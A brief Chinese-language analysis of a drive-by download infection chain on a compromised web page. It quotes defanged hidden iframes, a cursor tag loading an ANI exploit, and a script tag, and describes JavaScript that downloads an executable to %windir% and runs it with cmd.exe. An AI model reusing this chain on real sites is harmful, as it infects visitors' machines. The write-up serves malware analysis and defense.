网页被加入代码:
/----- <iframe src=hxxp://www.xa**it*an.cn/mm/mm.htm width=0 height=0></iframe> ---/
mm.htm包含代码:
/--- <iframe src=hxxp://www.97***72*5.com/?01***6 width=0 height=0></iframe> ---/
hxxp://www.97***72*5.com/?01***6
包含代码:
/--- <BODY style='CURSOR: url(hxxp://www.97***72*5.com/m*uxiao***2.jpg)'></BODY> <script src=hxxp://www.97***72*5.com/06****14.js></script> ---/
hxxp://www.97***72*5.com/m*uxiao***2.jpg(Kaspersky报为:Exploit.Win32.IMG-ANI.k)利用ANI漏洞下载97725.exe
hxxp://www.97***72*5.com/06****14.js
内容为JavaScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 97725.exe,保存到 %windir%,文件名由函数
/--- function gn(n) { var number = Math.random()*n; return '~tmp'+'.tmp'; } ---/
生成,即~tmp.tmp。然后通过Shell.Application 对象 Q的 ShellExecute 方法 执行命令:%windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。
